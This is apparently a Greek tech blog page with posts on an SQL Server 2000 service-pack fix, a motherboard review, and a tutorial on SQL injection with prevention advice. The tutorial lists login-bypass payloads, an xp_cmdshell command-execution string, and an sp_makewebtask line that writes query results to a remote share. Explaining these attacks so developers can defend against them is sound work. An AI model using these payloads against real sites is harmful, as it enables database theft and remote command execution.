    Όλα; Κάποιες ημέρες μετά το ERP δεν ξεκινάει στους χρήστες. Μετά από έλεγχο παρατηρείται ότι ο διαθέσιμος χώρος στον δίσκο που βρίσκονται οι βάσεις και συγκεκριμένα το log file έχει γεμίσει. Επόμενη παρατήρηση είναι ότι το μέγεθος του Log file της μίας βάσης έχει ξεπεράσει σε μέγεθος την ίδια την βάση. Detach την βάση, σβήσιμο του Log file και ξανά attach με καθαρό log file. Όλα δουλεύουν καλά μέχρι την επόμενη μέρα που το μέγεθος πάλι μεγαλώνει δραματικά και οι καθυστερήσεις στο σύστημα γίνονται καθημερινότητα. Διάφορες δοκιμές μας έδιχναν ποιο είναι το πρόβλημα και το ποιο ουσιαστικό ήταν ότι η βάση δεν μπορούσε να γίνει reindex καθώς όλα τα scheduled jobs απέτυχαν.
     
    Η διαδικασία γνωστή...
    backup τις βάσεις, detach τις βάσεις, uninstall όλου του SQL 2000 μαζί με το SP4, επανεγκατάσταση του SQL 2000 και εγκατάσταση του SP3a.
    Ξανά attach τις βάσεις και όλα τα γνωστά.
    Έκτοτε τα προβλήματα εξαφανίστηκαν.

    Σε αναζήτηση στο Internet θα βρείτε ότι το SP4 έχει πάρα πολλά προβλήματα, σε διάφορες εγκαταστάσεις.
     
    Συμπέρασμα 2: Το Business ERP σε Sql server 2000 παίζει σωστά με Service Pack 3a, σε συνδυασμό με το WMS.

    -------------------
     
    Συνοψίζοντας την παραπάνω ιστορία και ανάλυση και έχοντας μεταφέρει την γνώση αυτή και σε άλλο ένα συνάδελφο που αντιμετώπισε τα ίδια προβλήματα και είδαμε ότι τα προβλήματα του λύθηκαν, θα σημειώσω τις βασικές παρατηρήσεις.
     

    SQL server 2000 σε Windows 2003 server θέλει εγκατάσταση SP (το λέει και η Microsoft) Μακριά από το SP4
    Business ERP και SQL server 2000 θέλει MONO SP3a To SP3a δεν δημιουργεί πρόβλημα ούτε στο σύστημα WMS Μετά την εγκατάσταση του SP3a ελέγξτε τα πρωτόκολλα, ώστε να έχει σαν πρώτο το TCP/IP (και αποτσεκάρετε το force protocoll encryption)
    - Σε περίπτωση προβλημάτων με τα connections σε IIS (η λύση του unlimited connections που εφαρμόσαμε ΔΕΝ ΠΡΟΤΙΝΕΤΑΙ) 
    --------------------
    Δεν ξέρω κατά πόσο θα βοηθήσει κάποιον, αλλά όπως προανέφερα την γνώση αυτή την μοιράστηκα ήδη με ένα συνάδελφο που γλύτωσε πάρα πολύ χρόνο.
    Στην Ελλάδα του σήμερα εγκαταστάσεις Business ERP σε SQL 2000 είναι αρκετές, αλλά και γενικά εγκαταστάσεις SQL 2000 υπάρχουν σε εταιρείες, καλο είναι να έχουμε τα παραπάνω ως βοηθό ή μπούσουλα για την αποφυγή πονοκεφάλων.
     
  24. Blackman
    Πριν λίγες ημέρες έκανα μία αλλαγή στον προσωπικό μου υπολογιστή, αλλάζοντας την Motherboard που είχα με την Asus P5Q Deluxe. H εν λόγω mobo δεν είναι ότι πιο καινούριο (κατασκευάστηκε το 2008), αλλά ήταν πιθανότατα η καλύτερη λύση για να αλλάξω μόνο αυτή και να "κουμπώσω" όλα τα υπόλοιπα ως είχαν.



    Reviews μπορείτε να βρείτε άπειρα στο Internet, αλλά την δουλειά που έχει κάνει η Asus σε ένα συγκεκριμένο κομμάτι είναι όλο το "ζουμί" και αυτό λέγετε ASUS Express Gate.

    ASUS Express Gate

    Αυτό που έχει κάνει η ASUS είναι να ενσωματώνει στην mobo της το Splashtop , μία διανομή LINUX που δίνει την δυνατότητα στον χρήστη να βρεθεί συνδεδεμένος στο Internet σε λιγότερο από 5 δευτερόλεπτα.



    Το λειτουργικό σύστημα περιέχει Firefox, Skype, Pidgin (για να ρυθμίσει ο χρήστης τον αγαπημένο του ΙΜ Messenger, αλλά επίσης και δυνατότητα να δείτε φωτογραφίες από οποιοδήποτε αποθηκευτικό μέσο.

    Το σύστημα επίσης δίνει την δυνατότητα για την σχετική παραμετροποίηση σε θέματα δικτύου (dchp, static ip κλπ) αλλά και μερικών άλλων πραγμάτων.

    Αρκετά εντυπωσιακό, γιατί μιλάμε για ένα σύστημα ουσιαστικά που ακόμα και αν πάθει κάτι το λειτουργικό ή ο δίσκος σας, θα μπορείτε να μπείτε και να δείτε τα email σας ή να κάνετε ότι άλλο θέλετε στο Internet.

    ASUS Mobo (EPU - 6 engine) + Windows Vista (Power Options) = Better Environment

    Ένα επιπλέον χαρακτηριστικό που υπάρχει τουλάχιστον σε αυτή την Mobo, είναι ο τρόπος διαχείρισης του ρεύματος και την κατανάλωσης.



    Το 6 engine αντικατοπτρίζει τα 6 στοιχεία που μπορεί ο χρήστης να ελέγξει μέσω του σχετικού software της Asus μέσα από τα Windows.

    Αυτά είναι:


    Επεξεργαστής
    VGA
    Chipset
    Μνήμη
    Σκληροί δίσκοι
    Ανεμιστήρες


    Μέσω αυτού του συστήματος μπορείτε να ρυθμίσετε αρκετά πράγματα, που βασικό σκοπό έχουν να μειώσουν την κατανάλωση ενέργειας και την μείωση του CO2 που 'βγάζει' το σύστημα προς το περιβάλλον. (υπάρχει και σχετική μέτρηση που μετράει πόσο έχει μειώσει το CO2 που εκπέμπει το σύστημα σε σχέση με την κανονική του λειτουργία).

    Επίσης μέσω αυτού του συστήματος ο χρήστης έχει την δυνατότητα να κάνει και "overclocking" στον επεξεργαστή (η default ρύθμιση στην επιλογή του TURBO είναι +3%, ενώ στο SLOW είναι -1% της ταχύτητας της CPU).

    Οι ρυθμίσεις όπως μπορείτε να δείτε είναι πέντε. Αν όμως κάποιος θέλει να δημιουργήσει και ξεχωριστές ρυθμίσεις θα πρέπει να χρησιμοποιήσει αυτές του συστήματος. Στην περίπτωση των Windows Vista, τα power options (ειδικά οι advanced ρυθμίσεις) επιτρέπουν στον χρήστη να έχει ακόμα καλύτερο ενεργειακό αποτέλεσμα, πάνω στις οποίες ρυθμίσεις έρχεται να προστεθεί και το 6-engine σύστημα.

    ΣΥΜΠΕΡΑΣΜΑ

    Όπως καταλαβαίνετε με όλα τα παραπάνω, οδηγούμαστε όλο και περισσότερο στο σημείο που όλα τα συστήματα (Software & Hardware) θα μπορούν να λειτουργήσουν μεταξύ του και πλεον το Interoperability των συστημάτων εδραιώνεται και πέρα από τη συνεργασία των εφαρμογών ίδιων ή διαφορετικών λειτουργικών συστημάτων.

    Δεν χρειάζετε να σχολιάσω την ευκολία που μου προσφέρει η παραπάνω υλοποίηση της Asus. Επιτέλους μπορώ μένω ήσυχος από τους ενοχλητικούς ανεμιστήρες όταν απλά έχω το PC μου και 'κατεβάζει', αλλά και επίσης και το κλασικό που όταν βιάζεσαι αλλά θες να δεις κάτι γρήγορο στο Internet και δεν μπορείς να περιμένεις 1 λεπτό για να ξεκινήσει όλο το σύστημα σου.
  25. Blackman
    Ξεκινάω το συγκεκριμένο post για να δείτε πως γίνεται το hack που ονομάζεται SQL Injection, καθώς επίσης και διάφοροι τρόποι που προτείνονται για να αποφευχθεί κάτι τέτοιο και διάφορα άλλα. Σκοπός μου είναι να δώσω την εικόνα του συγκεκριμένου hack, αλλά αν θέλετε να μάθετε να το κάνετε θα πρέπει να το ψάξετε περισσότερο μόνοι σας.

    Τι είναι SQL Injection attack

    Όπως μπορείτε να βρείτε και στο Wikipedia, μιλάμε για μία τεχνική η οποία εκθέτει αδυναμίες στην ασφάλεια (security vulnerability exploit) μίας βάσης δεδομένων. Η συγκεκριμένη ‘τρύπα’ έχει να κάνει με το τρόπο που φιλτράρονται οι χρήστες ή γιατί τα usernames δεν είναι strongly typed. Οι επιθέσεις αυτές είναι επίσης γνωστές και ως SQL Insertion attacks.

    Μόλις ο hacker αποκτήσει πρόσβαση, τότε μπορεί να εκτελέσει ότι query θέλει πάνω στην βάση δεδομένων. Συνεπώς και να τραβήξει ή να αλλάξει όποια πληροφορία θέλει.

    SQL Injection FAQ

    Ε:Τι χρειάζεται κάποιος για να κάνει την παραπάνω επίθεση;

    Α:Απλά έναν web browser.

     

    Ε:Τι πρέπει να ψάξει για να κάνει κάποιος τη συγκεκριμένη επίθεση;

    Α:Σελίδες που επιτρέπουν την εισαγωγή δεδομένων όπως login page, search page, feedback κλπ. Μερικές φορές ακόμα και HTML σελίδες χρησιμοποιούν POST εντολές για να στείλουν τις σχετικές παραμέτρους σε κάποια σελίδα ASP. Οπότε σε αυτή την περίπτωση δεν θα δείτε τις παραμέτρους αυτές στην URL, αλλά μόνο αν ελέγξετε τον source code και ψάξετε και βρείτε το σημείο “FORM” μέσα στον κώδικα πχ

    <FORM action=Search/search.asp method=post>
    <input type=hidden name=A value=C>
    </FORM>

    Οτιδήποτε υπάρχει μεταξύ FORM & /FORM είναι πιθανές παράμετροι που θα μπορεί κάποιος να χρησιμοποιήσει.

     

    Ε:Τι γίνεται αν δεν βρίσκουμε σελίδα που να δέχεται εισαγωγή δεδομένων;

    A:Θα πρέπει να ψάξετε σελίδα ASP, JSP, CGI ή PHP. Αυτό που θα πρέπει να ψάχνει κάποιος είναι σελίδες όπως:

    http://autoexec.gr/index.asp?id=10

     

    E:Πως θα δοκιμάσουμε αν υπάρχει ‘τρύπα’

    A:Δοκιμάστε να γράψετε hi' or 1=1--

    αυτό μπορεί να είναι στο Login, στο Password ή ακόμα και την URL

    πχ http://autoexec.gr/index.asp?id=hi' or 1=1--

     

    E:Αλλά γιατί ' or 1=1--;

    Α:Πέραν του ότι μπορεί να γίνει bypass το login, είναι πιθανόν να δει κάποιος επιπλέον πληροφορίες που συνήθως δεν είναι διαθέσιμες. Αν πχ παμε σε μία σελίδα που έχει link σε μία άλλη σελίδα όπως http://autoexec.gr/index.asp?category=hardware

    Βλέπουμε ότι στο URL η μεταβλητή είναι το category, ενώ το hardware είναι η τιμή για την μεταβλητή. Αυτό που πλευρά κώδικα θα εμπεριέχει κώδικα σαν και τον παρακάτω:

    v_cat = request(“category")

    sqlstr=”SELECT * FROM hardwr WHERE PCategory=’” & v_cat & “’”

    set rs=conn.execute(sqlstr)

    Έτσι με το παραπάνω το SQL που ουσιαστικά αντιστοιχεί τον συγκεκριμένο κώδικα μπορεί να γίνει:

    SELECT * FROM hardwr WHERE PCategory=’hardware’

    όπου το query θα φέρει πίσω αποτελέσματα για το hardware.

    Οπότε σε αυτή την περίπτωση αν πάρουμε το url

    http://autoexec.gr/index.asp?category=hardware' or 1=1--

    Τώρα η μεταβλητή v_cat αντιστοιχεί στο "hardware' or 1=1--", οπότε αν το βάλουμε αυτό σε SQL query, θα έχουμε

    SELECT * FROM hardwr WHERE Pcategory=’hardware’ or 1=1--‘

    Τι έχουμε σε αυτή την περίπτωση; Ότι το query θα μας φέρει τα πάντα από τον πίνακα hardwr ασχέτως αν είναι ίσο με το hardware ή όχι. Η διπλή παύλα (--) λέει στον MS SQL server να αγνοήσει το υπόλοιπο query, το οποίο με την σειρά του θα παρατήσει το τελευταίο quote (‘). Μερικές φορές η διπλή παύλα μπορεί να αντικατασταθεί με το σύμβολο της δίεσης (#).

    Παρόλα αυτά όμως, αν δεν είναι SQL server ή δεν μπορείς (ή δεν θες) να αγνοήσεις το υπόλοιπο query, μπορούμε επίσης να δοκιμάσουμε να βάλουμε

    ‘ or 'a'='a

    Οπότε το SQL query θα γίνει:

    SELECT * FROM hardwr WHERE PCategory=’hardware’ or ‘a’=’a’

    Και θα έχουμε το ίδιο αποτέλεσμα.

    Αντίστοιχα μπορείτε να δοκιμάσετε

    ‘ or 1=1--

    “ or 1=1--

    or 1=1--

    ‘ or ‘a’=’a

    “ or “a”=”a

    ‘) or (‘a"=‘a

     

    E:Μπορώ να αποκτήσω δυνατότητα απομακρυσμένη εκτέλεσης με SQL Injection;

    Α:Οι χρήστες SQL και δη οι developers, γνωρίζουν ότι ο SQL είναι ένα πολύ δυνατό εργαλείο και αυτό γιατί τους δίνει την δυνατότητα να κάνουν ΤΑ ΠΑΝΤΑ σε ένα σύστημα. Έτσι, επειδή ο SQL Server τρέχει σαν SYSTEM, αυτό σημαίνει ότι τα δικαιώματα που έχει είναι επιπέδου administrator στο σύστημα. Οπότε εύκολα από την στιγμή που μπορούμε να τρέξουμε ότι θέλουμε, με την χρήση stored procedures (που είσαι Αντώνη

    '; exec master..xp_cdmshel ‘ping 10.10.1.2'--

    Σε περίπτωση που το μονό quote δεν δουλεύει, χρησιμοποιήστε διπλό.

    Το ερωτηματικό στην αρχή (η semi colon όπως το λένε στα ξένα) θα τερματίσει το SQL query που εκτελείται εκείνη την ώρα και θα μας επιτρέψει να ξεκινήσουμε μία νέα εντολή SQL. Για την επιβεβαίωση ότι η εντολή εκτελέστηκε σωστά μπορούμε να πάρουμε απάντηση από ping στην IP για να δούμε αν υπάρχει κάποιο πακέτο από τον server:

    #tcpdump icmp

    Αν δεν πάρουμε απάντηση από το Ping (που λέγετε Pong), και έχουμε μήνυμα λάθους που σχετίζεται με δικαιώματα, τότε πιθανόν ο administrator έχει περιορίσει την εκτέλεση των stored procedures στον Web User.

     

    E:Πως μπορώ να πάρω το αποτέλεσμα του query μου;

    Α:Με την χρήση του sp_makewebtask:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES"

    αλλά να έχετε υπόψη ότι ο φάκελος SHARE που θα βρίσκεται στην IP που θέλουμε πρέπει να έχει sharing pemissions σε Everyone.

     

    Φυσικά υπάρχουν απαντήσεις και σε άλλα ερωτήματα όπως να πάρουμε αποτελέσματα από μία βάση με την χρήση μηνυμάτων λάθους από ODBC ή πως να τραβήξουμε όλα τα ονόματα στηλών από ένα πίνακα, ή πως τραβάμε ότι data θέλουμε, πως να βάλουμε δικά μας data κλπ

    Οπότε καταλαβαίνετε ότι η όλη διαδικασία είναι μεγάλη και φυσικά άμεσα συνδεδεμένη με αυτό που κάνει και ένας developer. Αν για κάποιους δεν σας λένε τίποτα, σίγουρα για άτομα όπως ο Αντώνης του λένε πολλά.

    Αν θέλετε να μάθετε περισσότερα για SQL Injection δείτε τα παρακάτω…

    http://projects.webappsec.org/SQL-Injection

    http://msdn.microsoft.com/en-us/library/ms161953.aspx

    http://net.tutsplus.com/articles/can-you-hack-your-own-site-a-look-at-some-essential-security-considerations/

    http://en.wikipedia.org/wiki/SQL_injection

    http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#LineCommentAttacks

    http://geniushackers.com/blog/2009/04/08/sql-injection-ultimate-method-for-website-hacking/



     

    ΠΩΣ ΑΠΟΦΕΥΓΟΥΜΕ SQL INJECTIONS.

    Αν διαβάσετε τα παραπάνω θα πάρετε και μία εικόνα για το πρέπει να κάνετε ώστε να αποφύγετε τι ‘κακοτοπιές’ και συνεπώς να μην πέσετε θύμα μίας επίθεσης με SQL Injection. Αλλά θα αναφέρω και κάποια πράγματα και εγώ.

    Φροντίστε να ‘βγάλετε’ (εσείς ή κάποιος developer) εκτός χαρακτήρες όπως quotes, slash, backslash, semi colon, NULL, new line, κλπ και αυτά πρέπει να βγουν από τα εξής:

    1) εισαγωγή από χρήστες σε πεδίο

    2) παραμέτρους στην URL

    3) Τιμές από cookies

    Επίσης κάτι άλλο που προτείνεται είναι το να βεβαιωθείτε ότι όλα τα νούμερα έχουν μετατραπεί σε integer. Επίσης διαγράψτε stored procedures που δεν σας αρέσουν και δεν χρειάζεστε όπως master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask .

     

    ΓΕΝΙΚΑ ΣΥΜΠΕΡΑΣΜΑΤΑ

    Η χρήση SQL Injection καταλαβαίνετε ότι δεν είναι κάτι απλό. Είναι πιθανότατα ένα από τους πιο δυνατούς τρόπους για να κάνει κάποιος hacking και επίσης είναι ο πιο απλός καθώς δεν χρειάζεται ιδιαίτερα εργαλεία, αλλά μονάχα ένας web browser. Από εκεί και πέρα αν κάποιος έχει τις απαραίτητες γνώσεις μπορεί να αποκτήσει πλήρης πρόσβαση στο μηχάνημα, πέραν από τα δεδομένα που μπορεί να έχει η βάση δεδομένων. Αυτό που καταφέρνει να κάνει κάποιος ουσιαστικά είναι να ‘κοροϊδέψει το σύστημα και να του δώσει όλες τις πληροφορίες που ζητάει, και καταλαβαίνετε εύκολα ότι αν το συγκεκριμένο attack συνδυαστεί με Google Hacking η ζωή του επίδοξου hacker γίνεται ακόμα πιο εύκολη.

    Ελπίζω με το παραπάνω να πήρατε μία εικόνα για το τι είναι αυτή η μορφή επίθεσης, οπότε να πάρετε και τα μέτρα σας (όσοι χρειάζεται).

     

    Επιπλέον Links

    http://www.digitaloffense.net/wargames01/IOWargames.ppt
    http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
    http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
    http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

    http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

    http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

    http://www.owasp.org/asac/input_validation/sql.shtml

    http://www.sensepost.com/misc/SQLinsertion.htm
×
×
  • Create New...